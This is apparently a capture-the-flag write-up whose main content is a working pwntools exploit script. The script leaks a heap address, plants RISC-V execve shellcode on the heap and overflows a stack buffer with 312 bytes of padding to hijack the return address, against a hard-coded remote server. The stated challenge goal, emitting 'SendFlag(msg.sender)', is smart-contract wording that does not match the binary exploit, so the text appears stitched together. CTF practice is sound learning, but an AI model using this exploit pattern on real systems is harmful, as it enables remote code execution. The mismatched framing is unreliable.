Writeup source: team Venom
Challenge description
Your goal is to emit SendFlag(msg.sender)
Challenge topics
Solution approach
When echoing to a file that does not exist, the program writes the data onto the stack without a length check, so an over-long input overflows the stack. First leak a heap address, then redirect execution to the heap to run shellcode.
```python
from pwn import *

context.log_level = 'debug'
p = remote("121.37.222.236", 9999)

# Thin wrappers around the challenge's shell-like commands.
def add(name):
    p.sendlineafter("$ ", "touch " + name)

def free(name):
    p.sendlineafter("$ ", "rm " + name)

def show(name):
    p.sendlineafter("$ ", "cat " + name)

def edit(name, content):
    # "echo > name" prompts for the content as a separate input
    p.sendlineafter("$ ", "echo > " + name)
    p.send(content)

# Shape the heap: allocate four files, free two non-adjacent ones, then
# reallocate so that "cat a" prints a heap pointer left in the reused chunk.
add("aaa")
add("bbb")
add("ccc")
add("ddd")
free("aaa")
free("ccc")
add("a")
show("a")  # heap address leak

# Stage the shellcode in a heap chunk. Bytes literal so the raw bytes are sent
# unchanged under Python 3 (the last two instructions, li a7, 221 / ecall, are
# the RISC-V execve syscall).
add("b")
shellcode = (b"\x01\x11\x06\xec\x22\xe8\x13\x04\x21\x02\xb7\x67\x69\x6e\x93\x87"
             b"\xf7\x22\x23\x30\xf4\xfe\xb7\x77\x68\x10\x33\x48\x08\x01\x05\x08"
             b"\x72\x08\xb3\x87\x07\x41\x93\x87\xf7\x32\x23\x32\xf4\xfe\x93\x07"
             b"\x04\xfe\x01\x46\x81\x45\x3e\x85\x93\x08\xd0\x0d\x73\x00\x00\x00")
edit("b", shellcode)

# "echo > e" on a file that does not exist copies the input into a stack
# buffer with no length check: 312 bytes of padding reach the saved return
# address, which is overwritten with the heap address of the shellcode
# (hard-coded as 0x25f10 in the original script).
p.sendlineafter("$ ", "echo > e")
p.send(b"a" * 312 + p32(0x25f10))
p.interactive()
```